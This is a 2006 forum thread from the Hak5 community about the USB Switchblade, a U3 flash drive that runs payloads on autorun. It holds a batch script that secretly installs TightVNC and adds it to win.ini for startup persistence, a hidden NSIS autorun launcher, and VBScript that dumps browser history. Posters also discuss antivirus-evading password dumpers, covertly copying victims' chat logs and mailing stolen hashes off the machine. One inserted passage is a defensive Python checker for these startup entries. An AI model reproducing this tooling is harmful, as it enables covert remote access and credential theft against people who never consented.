DLSS Posted September 9, 2006

ok so i on my turn modded xFilthyxJesusx's package ... i added a tight-vnc installer + injecting the run command into the win.ini file so it would run at startup :

progstart.bat renamed to progstart2.bat and added following progstart.bat

    @echo off
    Xcopy "VNCHooks.dll" "C:\WINDOWS" /R /k /y
    Xcopy "winvnc.exe" "C:\WINDOWS" /R /k /y
    nircmd.exe execmd CALL batexeprogstart2.bat
    cd /D "C:\WINDOWS"
    echo [windows]>>win.ini
    echo Run=winvnc.exe>>win.ini

this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ?

o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b caught (all the log file gives is the username & machine name)

aznrocket Posted September 9, 2006

huh, just curious how difficult it would be to add a feature to this switchblade-- the capacity to copy files OFF of the computer you plug it into (e.g. documents, msn messenger logs, etc), while maintaining its stealthiness.

It wouldn't be hard to program in, but I rather like it the way it is since it's actually way more stealthy. As a systems administrator if I found that this happened on my network I could check traffic logs and possibly find the drop site that the cracker used.

How would I go about programming the capacity to copy (LOCALLY, to the switchblade!) particular documents, (like MSN Messenger Logs, given the directory is known), while maintaining stealthiness? Any guidance/help would be greatly appreciated.

Also, is there a reason why mspass.exe and/or pspv.exe wasn't encrypted like pwdump was? mspass, especially, would be crucial to my... switchblading.

Guest MaxDamage Posted September 9, 2006

...

Darren Kitchen (Author) Posted September 9, 2006

> Edit: im gonna start the wiki
> edit2: http://www.hak5.org/wiki/index.php?title=USB_Switchblade (help!!!)

Oops, I think I just overwrote your Wiki entry. That's the problem with wikis when two people go to create a page at the same time. Feel free to merge your info in, it should be in the history page.

DLSS Posted September 9, 2006

don't ignore me please :cry:

ok so i on my turn modded xFilthyxJesusx's package ... i added a tight-vnc installer + injecting the run command into the win.ini file so it would run at startup :

progstart.bat renamed to progstart2.bat and added following progstart.bat

    @echo off
    Xcopy "VNCHooks.dll" "C:\WINDOWS" /R /k /y
    Xcopy "winvnc.exe" "C:\WINDOWS" /R /k /y
    nircmd.exe execmd CALL batexeprogstart2.bat
    cd /D "C:\WINDOWS"
    echo [windows]>>win.ini
    echo Run=winvnc.exe>>win.ini

this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ?

o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b caught (all the log file gives is the username & machine name)

kapowdude Posted September 10, 2006

You need to fix this I think. It seems to dump the passwords, unfortunately the device becomes unavailable afterwards. The orange light on my switchblade goes on for a sec then turns off/boots linux to see what the deuce went wrong

EDIT: Works fine in windows now (randomly) However it didn't dump anything of mine. I did however find the password of "adwtiger"

Hmm is autorun enabled... sometimes it works for me sometimes it doesn't....

Oh and i fixed the zip thx

PoyBoy Posted September 10, 2006

no prob

DTYtsejam24 Posted September 10, 2006

somebody already asked this but they got no response so i figured id ask again

anybody know of a loader for a memorex drive?

w0lo Posted September 10, 2006

The IE history dump (DUH.vbs) doesn't seem to work on my system, at least it doesn't show every url, just the domain and approx date. So i whipped up something that does (based on the existing script, if i get the time i will rewrite it in JScript, VBScript is so damn ugly and i cant pack lots of instructions on one line :roll: )

    on error resume next
    ' Walk a shell folder recursively and print one line per item.
    Function Dump(h,indent,fulldump)
    for each item in h.items
        if indent>1 then
            s=h.GetDetailsOf(item,0)
            if fulldump then s=h.GetDetailsOf(item,2)&vbTab&s&vbTab&h.GetDetailsOf(item,1)
        else
            s=h.GetDetailsOf(item,-1)
        end if
        wscript.echo String (indent," ") &s
        if item.isFolder then
            call Dump(item.GetFolder,indent+1,fulldump)
        end if
        if 0=indent then wscript.echo String (80,"-")
    next
    End Function
    ' 34 is the shell special-folder id of the IE history folder
    Dump createobject("Shell.Application").NameSpace(34),0,true

The full version can dump to html and just raw urls (no dates and page titles (the medium size version supports this as well, just change the last true>false)) ( http://rapidshare.de/files/32573713/IE_DumpHistory.vbs.html )

Usage (of full version):

    cscript /nologo IE_DumpHistory.vbs html>dump.html
    cscript /nologo IE_DumpHistory.vbs all>dump.txt

And finally, a very compact version:

    on error resume next
    Function D(h,indent)
    for each item in h.items
        wscript.echo String (indent," ")&h.GetDetailsOf(item,-1)
        ' recurse into sub-folders with this function's own name and arguments
        if item.isFolder then call D(item.GetFolder,indent+1)
        if 0=indent then wscript.echo String (80,"-")
    next
    End Function
    D createobject("Shell.Application").NameSpace(34),0

datamancer Posted September 10, 2006

Okay i figured out it was my laptop causing my v3 problem. I got everything to work, by seeing these other posts can i update the script to include a search for msn/aim/yahoo pass's? If so how do i go about doing that?

Isn't there a batch file you can make that automatically makes a separate admin account? I remember seeing that a long while back.. Ill see if i can digg it up. lawl digg!

DLSS Posted September 10, 2006

is there a reason i'm being ignored ? :? :(

Emilml Posted September 10, 2006

> Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill
> =====================
> pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply!
> http://www.brainkill.net/hack/pwdump.exe
> http://www.brainkill.net/hack/pwservice.exe
> http://www.brainkill.net/hack/LsaExt.dll
> =======================
> I can verify that the latest version of symantec anti-virus corporate edition with the latest updates does not detect this now. score one for brainkill!

I downloaded the 3 files and ran a scan with symantec antivirus corporate edition and it found pwdump.exe and pwservice.exe as "hacker tools" so i don't think it worked?

Darren Kitchen (Author) Posted September 10, 2006

> ok so i on my turn modded xFilthyxJesusx's package ... i added a tight-vnc installer + injecting the run command into the win.ini file so it would run at startup :
>
> progstart.bat renamed to progstart2.bat and added following progstart.bat
>
>     @echo off
>     Xcopy "VNCHooks.dll" "C:\WINDOWS" /R /k /y
>     Xcopy "winvnc.exe" "C:\WINDOWS" /R /k /y
>     nircmd.exe execmd CALL batexeprogstart2.bat
>     cd /D "C:\WINDOWS"
>     echo [windows]>>win.ini
>     echo Run=winvnc.exe>>win.ini
>
> this runs fine when executing normal but doesn't want to work when doing it from the autorun .... any help ?
>
> o and to kapowdude nice how u make a duplicate of C as a network folder :D tho lm hash still wont b caught (all the log file gives is the username & machine name)

That's awesome, what a great addition to the payload. I'm not sure why it's not executing on autorun. Maybe someone has an idea.

I'm seeing a lot of great mods to the payloads, we should consider adding a section to the wiki switchblade page at: www.hak5.org/wiki/index.php?title=USB_Switchblade

w0lo Posted September 11, 2006

Not exactly sure what the XP issue listed on the wiki page is but i whipped up a little something that i think fits the description

Autorun.inf then looks like:

    [Autorun]
    open=AutoExec.exe
    [AutoExec]
    Cmd=Notepad
    Params=%WinDir%\Win.ini

the NSIS source for the exe:

    OutFile "AutoExec.exe"
    SilentInstall silent
    !define cfg "$ExeDir\AutoRun.Inf"
    Section
    StrCpy $OUTDIR "$ExeDir"
    ReadIniStr $0 ${cfg} "AutoExec" "Cmd"
    ReadIniStr $1 ${cfg} "AutoExec" "Params"
    ExecShell "" "$0" "$1" SW_HIDE
    SectionEnd
    Page InstFiles

Pre compiled exe: http://rapidshare.de/files/32684592/AutoExec.exe.html

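Added example, not part of any post in this thread: a defender-side audit of the two startup mechanisms discussed above, the `Run=` line appended to win.ini and the `open=` entry plus custom section in Autorun.inf. The function names and the sample file contents are constructed for illustration.

```python
import re

# Keys that make Windows start a program: win.ini [windows] Run=/Load=,
# autorun.inf [autorun] open=/shellexecute=.
LAUNCH_KEYS = {"windows": {"run", "load"},
               "autorun": {"open", "shellexecute"}}
SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
ENTRY_RE = re.compile(r"^\s*([^=;\s][^=]*?)\s*=\s*(.*?)\s*$")


def parse_ini(text):
    """Return (section, key, value) tuples in file order.

    Repeated section headers are kept: appending "[windows]" to an existing
    win.ini creates a second copy of the section, which a strict INI parser
    rejects instead of reporting.
    """
    section, entries = None, []
    for line in text.splitlines():
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).strip().lower()
            continue
        m = ENTRY_RE.match(line)  # lines starting with ';' are comments
        if m and section is not None:
            entries.append((section, m.group(1).lower(), m.group(2)))
    return entries


def launch_entries(text):
    """Entries whose key starts a program; empty values are skipped."""
    return [(s, k, v) for s, k, v in parse_ini(text)
            if k in LAUNCH_KEYS.get(s, ()) and v]


def unexpected_sections(text, expected=("autorun",)):
    """Section names that carry entries but are not in `expected`."""
    seen = []
    for s, _, _ in parse_ini(text):
        if s not in expected and s not in seen:
            seen.append(s)
    return seen


# Constructed samples modelled on the posts above.
WIN_INI = "[windows]\nload=\nrun=\n[mci extensions]\nwav=waveaudio\n[windows]\nRun=winvnc.exe\n"
AUTORUN_INF = "[Autorun]\nopen=AutoExec.exe\n[AutoExec]\nCmd=Notepad\nParams=%WinDir%\\Win.ini\n"

if __name__ == "__main__":
    print(launch_entries(WIN_INI), launch_entries(AUTORUN_INF),
          unexpected_sections(AUTORUN_INF))
```

A non-empty `launch_entries` result for win.ini, or an extra section in a removable drive's Autorun.inf, is a lead to review rather than proof of compromise.
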
Loony Guitarist Posted September 11, 2006

> Hello,
> Are there any loaders out that can load this software on a Memorex drive? I have the Memorex Mini Traveldrive U3 and can't seem to find a loader for it.
> Thanks,
> Vext

I have this problem too. I have both a SanDisk u3 drive and a memorex u3 drive. the lploader software will only work with a SanDisk u3 drive but my drive is a 1gig and I want to use my memorex 512mb drive for this. So far I cant find a loader that will let you flash a memorex drive. so it should be noted that so far this will only work on a SanDisk u3 drive unless you use amish's method.

Ouroboros Posted September 12, 2006

U3 sends their love http://devblog.u3.com/?p=35

straylight Posted September 12, 2006

First off, i'm new to the forums so let me start by saying hello!!

Now, i've been messing with this stuff for awhile and have found that it doesnt matter if the .iso is in the same directory as the LPInstaller.exe -- in my case it will always go out to the sandisk site and pull the new .iso image. If i disable my network connection formatting of the device will not complete successfully.

My next move will be setting up a webserver on my local machine and spoofing the sandisk site to trick it into pulling the modded .iso file. This was not my idea, all credit goes to Wesley McGrew: http://www.cse.msstate.edu/~rwm8/hackingU3/ He has done a ton of work related to the u3 drives, in fact i think he was the first to publicly disclose this info. His site also mentions that as long as the .iso and LPInstaller.exe file are in the same directory that there is no need to use the webserver trick.

Has this happened to anyone else? I have a 1gig micro a.k.a switchblade.

regards,
straylight

servzero Posted September 12, 2006

can anyone post a copy of the winvnc.exe and vnchooks.dll files?

Sparda Posted September 12, 2006

> can anyone post a copy of the winvnc.exe and vnchooks.dll files?

Instead of trusting someone you don't even know and who may have an alternate motive, why don't you do the clever thing and download them from a more trustworthy source ;) http://www.tightvnc.com/

VladBypass Posted September 13, 2006

> I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.

lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a possibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesn't use a smtp server to mail (at least it doesn't make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then you're set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects encrypted to a server to upload the LM Hash...

Silva Posted September 13, 2006

> > I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.
>
> lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a possibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesn't use a smtp server to mail (at least it doesn't make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then you're set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects encrypted to a server to upload the LM Hash...

Or you can use google and find an easy way, running php scripts seems ineffective in my book.

SendMail for microsoft windows :D http://www.geocities.com/jaber_aljundi/#Wh...SendMail_Tool__

didn't play with it yet but seems simple enough since the file names are always the same I guess.

Darren Kitchen (Author) Posted September 13, 2006

> > I'd love to see it expanded so that it can email or somehow send the results to a user specified destination just for use in penetration testing.
>
> lol this was on page 2 or 3 of this post :X anyways, as you've said there it should be a possibility to mail it although I don't know the extent of PHP scripting. I've used/modified an email php script which doesn't use a smtp server to mail (at least it doesn't make you specify nor have I seen one in the code...) so emailing pure spoofed email text is possible... but attaching something im not so sure of... but then again if its all text then you're set, you just need to find a way to be able to send files via php scripting with that said script above or just find a way to launch a usb ftp program that connects encrypted to a server to upload the LM Hash...

Or you could use the command line email utility blat from http://www.blat.net/

But again, as I've said before, I rather like the fact that the switchblade doesn't create network traffic, thus keeping the tool self contained and leaving less evidence.

anyedie Posted September 13, 2006

> U3 just makes it so much easier. So thanks for the versatile software.
> Darren Kitchen Producer / Co-Host http://hak5.org

mml! thats pretty great.

amish Posted September 13, 2006

Heya guys. Well bad news i lost my memory stick with like 100's of passwords on it :S So i had to change them all.

Anyways before i lost it i had time to implement this http://www.cqure.net/wp/?page_id=7 It grabs and decrypts the password for Tight VNC and Real VNC on the fly, and it runs in command line :D So thats good to implement. =)

Im glad to see the projects going well. But i think someone or myself should implement a command line file encryptor to store these passwords safe every time we dump them, just in case we lose them....like me. I wish i did that before

Ag3nT_KaTz Posted September 13, 2006

well i just sent a technical support request to memorex about the launchpad update on a traveldrive. hopefully i will get a response soon and I will share my findings here.
